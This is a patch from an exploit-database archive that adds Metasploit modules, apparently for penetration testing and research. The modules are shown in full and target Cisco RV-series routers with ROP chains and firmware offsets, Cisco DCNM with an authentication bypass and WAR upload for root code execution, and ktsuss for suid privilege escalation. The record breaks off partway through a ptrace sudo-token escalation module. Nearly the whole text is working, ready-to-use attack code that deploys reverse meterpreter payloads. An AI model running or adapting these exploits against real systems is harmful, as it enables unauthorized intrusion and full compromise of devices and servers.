From a26ef1328e0b3eb9ff26ceb93b57335e705ade7e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 4 Sep 2019 05:02:30 +0000 Subject: [PATCH] DB: 2019-09-04 6 changes to exploits/shellcodes ktsuss 1.4 - suid Privilege Escalation (Metasploit) ptrace - Sudo Token Privilege Escalation (Metasploit) Cisco UCS Director - default scpuser password (Metasploit) Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit) Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit) FileThingie 2.5.7 - Arbitrary File Upload --- exploits/hardware/remote/47348.rb | 423 ++++++++++++++++++++++++++++++ exploits/java/remote/47347.rb | 280 ++++++++++++++++++++ exploits/linux/local/47344.rb | 142 ++++++++++ exploits/linux/local/47345.rb | 213 +++++++++++++++ exploits/php/webapps/47349.txt | 153 +++++++++++ exploits/unix/remote/47346.rb | 139 ++++++++++ files_exploits.csv | 6 + 7 files changed, 1356 insertions(+) create mode 100755 exploits/hardware/remote/47348.rb create mode 100755 exploits/java/remote/47347.rb create mode 100755 exploits/linux/local/47344.rb create mode 100755 exploits/linux/local/47345.rb create mode 100644 exploits/php/webapps/47349.txt create mode 100755 exploits/unix/remote/47346.rb diff --git a/exploits/hardware/remote/47348.rb b/exploits/hardware/remote/47348.rb new file mode 100755 index 000000000..c10ee4b52 --- /dev/null +++ b/exploits/hardware/remote/47348.rb @@ -0,0 +1,423 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# linux/armle/meterpreter/bind_tcp -> segfault +# linux/armle/meterpreter/reverse_tcp -> segfault +# linux/armle/meterpreter_reverse_http -> works +# linux/armle/meterpreter_reverse_https -> works +# linux/armle/meterpreter_reverse_tcp -> works +# linux/armle/shell/bind_tcp -> segfault +# linux/armle/shell/reverse_tcp -> segfault +# linux/armle/shell_bind_tcp -> segfault +# linux/armle/shell_reverse_tcp -> segfault +# +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::Deprecated + + moved_from 'exploit/linux/http/cisco_rv130_rmi_rce' + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution', + 'Description' => %q{ + A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, + Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router + could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. + + The vulnerability is due to improper validation of user-supplied data in the web-based management interface. + An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. + + A successful exploit could allow the attacker to execute arbitrary code on the underlying operating + system of the affected device as a high-privilege user. + + RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. + RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. + RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. + + Note: successful exploitation may not result in a session, and as such, + on_new_session will never repair the HTTP server, leading to a denial-of-service condition. + }, + 'Author' => + [ + 'Yu Zhang', # Initial discovery (GeekPwn conference) + 'Haoliang Lu', # Initial discovery (GeekPwn conference) + 'T. Shiomitsu', # Initial discovery (Pen Test Partners) + 'Quentin Kaiser ' # Vulnerability analysis & exploit dev + ], + 'License' => MSF_LICENSE, + 'Platform' => %w[linux], + 'Arch' => [ARCH_ARMLE, ARCH_MIPSLE], + 'SessionTypes' => %w[meterpreter], + 'CmdStagerFlavor' => %w{ wget }, + 'Privileged' => true, # BusyBox + 'References' => + [ + ['CVE', '2019-1663'], + ['BID', '107185'], + ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'], + ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/'] + ], + 'DefaultOptions' => { + 'WfsDelay' => 10, + 'SSL' => true, + 'RPORT' => 443, + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + }, + 'Targets' => + [ + [ 'Cisco RV110W 1.1.0.9', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af06000, + 'libcrypto_base_addr' => 0x2ac01000, + 'system_offset' => 0x00050d40, + 'got_offset' => 0x0009d560, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.0.9', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af08000, + 'libcrypto_base_addr' => 0x2ac03000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.0.10', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af09000, + 'libcrypto_base_addr' => 0x2ac04000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.1.4', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af54000, + 'libcrypto_base_addr' => 0x2ac4f000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV110W 1.2.1.7', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af98000, + 'libcrypto_base_addr' => 0x2ac4f000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV130/RV130W < 1.0.3.45', + { + 'offset' => 446, + 'libc_base_addr' => 0x357fb000, + 'system_offset' => 0x0004d144, + 'gadget1' => 0x00020e79, # pop {r2, r6, pc}; + 'gadget2' => 0x00041308, # mov r0, sp; blx r2; + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', + } + }, + ], + [ 'Cisco RV215W 1.1.0.5', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af59000, + 'libcrypto_base_addr' => 0x2ac54000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.1.0.6', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af59000, + 'libcrypto_base_addr' => 0x2ac54000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.2.0.14', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af5f000, + 'libcrypto_base_addr' => 0x2ac5a001, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.2.0.15', + { + 'offset' => 69, + 'libc_base_addr' => 0x2af5f000, + 'libcrypto_base_addr' => 0x2ac5a000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x00098db0, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.3.0.7', + { + 'offset' => 77, + 'libc_base_addr' => 0x2afeb000, + 'libcrypto_base_addr' => 0x2aca5000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x000a0530, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + [ 'Cisco RV215W 1.3.0.8', + { + 'offset' => 77, + 'libc_base_addr' => 0x2afee000, + 'libcrypto_base_addr' => 0x2aca5000, + 'system_offset' => 0x0004c7e0, + 'got_offset' => 0x000a0530, + # gadget 1 is in /usr/lib/libcrypto.so + 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', + } + } + ], + ], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [ CRASH_SERVICE_DOWN, ], + }, + )) + end + + def p(lib, offset) + [(lib + offset).to_s(16)].pack('H*').reverse + end + + def prepare_shellcode(cmd) + case target + # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7 + # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8 + when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11] + shellcode = rand_text_alpha(target['offset']) + # filler + rand_text_alpha(4) + # $s0 + rand_text_alpha(4) + # $s1 + rand_text_alpha(4) + # $s2 + rand_text_alpha(4) + # $s3 + p(target['libc_base_addr'], target['system_offset']) + # $s4 + rand_text_alpha(4) + # $s5 + rand_text_alpha(4) + # $s6 + rand_text_alpha(4) + # $s7 + rand_text_alpha(4) + # $s8 + p(target['libcrypto_base_addr'], target['gadget1']) + # $ra + p(target['libc_base_addr'], target['got_offset']) + + rand_text_alpha(28) + + cmd + shellcode + when targets[5] # RV130/RV130W + shellcode = rand_text_alpha(target['offset']) + # filler + p(target['libc_base_addr'], target['gadget1']) + + p(target['libc_base_addr'], target['system_offset']) + # r2 + rand_text_alpha(4) + # r6 + p(target['libc_base_addr'], target['gadget2']) + # pc + cmd + shellcode + end + end + + def send_request(buffer) + begin + send_request_cgi({ + 'uri' => '/login.cgi', + 'method' => 'POST', + 'vars_post' => { + "submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": 0, + "change_action": "", + "enc": 1, + "user": rand_text_alpha_lower(5), + "pwd": buffer, + "sel_lang": "EN" + } + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") + end + end + + def check + + # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users. + # We use lang_pack/EN.js because it's the one file that changes the most between versions. + # Note that it's not a smoking gun given that some branches keep the exact same files in /www + # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x) + + fingerprints = { + "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => { + "version" => "Cisco RV110W 1.1.0.9", + "status" =>Exploit::CheckCode::Vulnerable + }, + "8d3b677d870425198f7fae94d6cfe262551aa8bd" => { + "version" => "Cisco RV110W 1.2.0.9", + "status" => Exploit::CheckCode::Vulnerable + }, + "134ee643ec877641030211193a43cc5e93c96a06" => { + "version" => "Cisco RV110W 1.2.0.10", + "status" => Exploit::CheckCode::Vulnerable + }, + "e3b2ec9d099a3e3468f8437e5247723643ff830e" => { + "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + }, + "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => { + "version" => "Cisco RV130/RV130W 1.0.0.21", + "status" => Exploit::CheckCode::Vulnerable + }, + "9b1a87b752d11c5ba97dd80d6bae415532615266" => { + "version" => "Cisco RV130/RV130W 1.0.1.3", + "status" => Exploit::CheckCode::Vulnerable + }, + "9b6399842ef69cf94409b65c4c61017c862b9d09" => { + "version" => "Cisco RV130/RV130W 1.0.2.7", + "status" => Exploit::CheckCode::Vulnerable + }, + "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => { + "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16", + "status" => Exploit::CheckCode::Vulnerable + }, + "8c8e05de96810a02344d96588c09b21c491ede2d" => { + "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + }, + "2f29a0dfa78063d643eb17388e27d3f804ff6765" => { + "version" => "Cisco RV215W 1.1.0.5", + "status" => Exploit::CheckCode::Vulnerable + }, + "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => { + "version" => "Cisco RV215W 1.1.0.6", + "status" => Exploit::CheckCode::Vulnerable + }, + "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => { + "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15", + "status" => Exploit::CheckCode::Vulnerable + }, + "050d47ea944eaeadaec08945741e8e380f796741" => { + "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)", + "status" => Exploit::CheckCode::Unknown + } + } + + uri = target_uri.path + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'lang_pack/EN.js') + }) + if res && res.code == 200 + fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}") + if fingerprints.key?(fingerprint) + print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}") + return fingerprints[fingerprint]["status"] + else + print_status("Couldn't reliably fingerprint the target.") + end + end + Exploit::CheckCode::Unknown + end + + def exploit + print_status('Sending request') + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + shellcode = prepare_shellcode(cmd.to_s) + send_request(shellcode) + end + + def on_new_session(session) + # Given there is no process continuation here, the httpd server will stop + # functioning properly and we need to take care of proper restart + # ourselves. + print_status("Reloading httpd service") + reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S" + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\"" + else + session.shell_command(reload_httpd_service) + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/java/remote/47347.rb b/exploits/java/remote/47347.rb new file mode 100755 index 000000000..d1d930f6f --- /dev/null +++ b/exploits/java/remote/47347.rb @@ -0,0 +1,280 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution', + 'Description' => %q{ + DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. + An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps + directory and achieve remote code execution as root. + This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on + versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct + directory for the WAR file upload. + This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should + work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit + (see References to understand why). + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-1619' ], # auth bypass + [ 'CVE', '2019-1620' ], # file upload + [ 'CVE', '2019-1622' ], # log download + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ], + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Automatic', {} ], + [ + 'Cisco DCNM 11.1(1)', {} + ], + [ + 'Cisco DCNM 11.0(1)', {} + ], + [ + 'Cisco DCNM 10.4(2)', {} + ] + ], + 'Privileged' => true, + 'DefaultOptions' => { 'WfsDelay' => 10 }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 26 2019' + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Connect with TLS', true]), + OptString.new('TARGETURI', [true, "Default server path", '/']), + OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']), + OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']), + ]) + end + + def check + # at the moment this is the best way to detect + # check if pmreport and fileUpload servlets return a 500 error with no params + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), + 'vars_get' => + { + 'token' => rand_text_alpha(5..20) + }, + 'method' => 'GET' + ) + if res && res.code == 500 + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), + 'method' => 'GET', + ) + if res && res.code == 500 + return CheckCode::Detected + end + end + + CheckCode::Unknown + end + + def target_select + if target != targets[0] + return target + else + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'), + 'method' => 'GET' + ) + if res && res.code == 200 + if res.body.include?('version":"11.1(1)') + print_good("#{peer} - Detected DCNM 11.1(1)") + print_status("#{peer} - No authentication required, ready to exploit!") + return targets[1] + elsif res.body.include?('version":"11.0(1)') + print_good("#{peer} - Detected DCNM 11.0(1)") + print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit") + return targets[2] + elsif res.body.include?('version":"10.4(2)') + print_good("#{peer} - Detected DCNM 10.4(2)") + print_status("#{peer} - No authentication required, ready to exploit!") + return targets[3] + else + print_error("#{peer} - Failed to detect target version.") + print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!") + print_error(res.body) + print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass") + return targets[3] + end + end + fail_with(Failure::NoTarget, "#{peer} - Failed to determine target") + end + end + + def auth_v11 + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm/'), + 'method' => 'GET', + 'vars_get' => + { + 'userName' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }, + ) + + if res && res.code == 200 + # get the JSESSIONID cookie + if res.get_cookies + res.get_cookies.split(';').each do |cok| + if cok.include?("JSESSIONID") + return cok + end + end + end + end + end + + def auth_v10 + # step 1: get a JSESSIONID cookie and the server Date header + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm/'), + 'method' => 'GET' + ) + + # step 2: convert the Date header and create the auth hash + if res && res.headers['Date'] + jsession = res.get_cookies.split(';')[0] + date = Time.httpdate(res.headers['Date']) + server_date = date.strftime("%s").to_i * 1000 + print_good("#{peer} - Got sysTime value #{server_date.to_s}") + + # auth hash format: + # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF + session_id = rand(1000..50000).to_s + md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s + + "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" + md5_str = Base64.strict_encode64(md5) + + # step 3: authenticate our cookie as admin + # token format: sessionId.sysTime.md5_str.username + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), + 'cookie' => jsession, + 'vars_get' => + { + 'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin" + }, + 'method' => 'GET' + ) + + if res && res.code == 500 + return jsession + end + end + end + + # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log + def get_war_path + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'), + 'method' => 'GET' + ) + + if res && res.code == 200 + tmp = Tempfile.new + # we have to drop this into a file first + # else we will get a Zip::GPFBit3Error if we use an InputStream + File.binwrite(tmp, res.body) + Zip::File.open(tmp) do |zis| + zis.each do |entry| + if entry.name =~ /jboss[0-9]*\.log/ + fdata = zis.read(entry) + if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/] + tmp.close + tmp.unlink + return $1.strip + end + end + end + end + end + end + + + def exploit + target = target_select + + if target == targets[2] + jsession = auth_v11 + elsif target == targets[3] + jsession = auth_v10 + end + + # targets[1] DCNM 11.1(1) doesn't need auth! + if jsession.nil? && target != targets[1] + fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie") + elsif target != targets[1] + print_good("#{peer} - Successfully authenticated our JSESSIONID cookie") + end + + war_path = get_war_path + if war_path.nil? or war_path.empty? + fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs") + else + print_good("#{peer} - Obtain WAR path from logs: #{war_path}") + end + + # Generate our payload... and upload it + app_base = rand_text_alphanumeric(6..16) + war_payload = payload.encoded_war({ :app_name => app_base }).to_s + + fname = app_base + '.war' + post_data = Rex::MIME::Message.new + post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"") + post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"") + post_data.add_part(war_payload, + "application/octet-stream", 'binary', + "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"") + data = post_data.to_s + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), + 'method' => 'POST', + 'data' => data, + 'cookie' => jsession, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + ) + + if res && res.code == 200 && res.body[/#{fname}/] + print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...") + + sleep 10 + + print_status("#{peer} - Executing payload...") + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, app_base), + 'method' => 'GET' + ) + else + fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file") + end + end +end \ No newline at end of file diff --git a/exploits/linux/local/47344.rb b/exploits/linux/local/47344.rb new file mode 100755 index 000000000..df09d2abf --- /dev/null +++ b/exploits/linux/local/47344.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ktsuss suid Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The ktsuss executable is setuid root and does not drop + privileges prior to executing user specified commands, + resulting in command execution with root privileges. + + This module has been tested successfully on: + + ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and + ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Lightsey', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2011-08-13', + 'References' => + [ + ['CVE', '2011-2921'], + ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'], + ['URL', 'https://security.gentoo.org/glsa/201201-15'], + ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'AppendExit' => true, + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependSetreuid' => true, + 'PrependSetuid' => true, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss']) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def ktsuss_path + datastore['KTSUSS_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + unless setuid? ktsuss_path + vprint_error "#{ktsuss_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{ktsuss_path} is setuid" + + id = cmd_exec 'whoami' + res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s + vprint_status res + + unless res.include? 'uid=0' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload ...' + id = cmd_exec 'whoami' + res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo " + vprint_line res + end +end \ No newline at end of file diff --git a/exploits/linux/local/47345.rb b/exploits/linux/local/47345.rb new file mode 100755 index 000000000..8afe41fe2 --- /dev/null +++ b/exploits/linux/local/47345.rb @@ -0,0 +1,213 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Kernel + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ptrace Sudo Token Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by blindly injecting into + the session user's running shell processes and executing commands by + calling `system()`, in the hope that the process has valid cached sudo + tokens with root privileges. + + The system must have gdb installed and permit ptrace. + + This module has been tested successfully on: + + Debian 9.8 (x64); and + CentOS 7.4.1708 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'chaignc', # sudo_inject + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2019-03-24', + 'References' => + [ + ['EDB', '46989'], + ['URL', 'https://github.com/nongiach/sudo_inject'], + ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'], + ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'], + ['URL', 'https://lwn.net/Articles/393012/'], + ['URL', 'https://lwn.net/Articles/492667/'], + ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'], + ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + 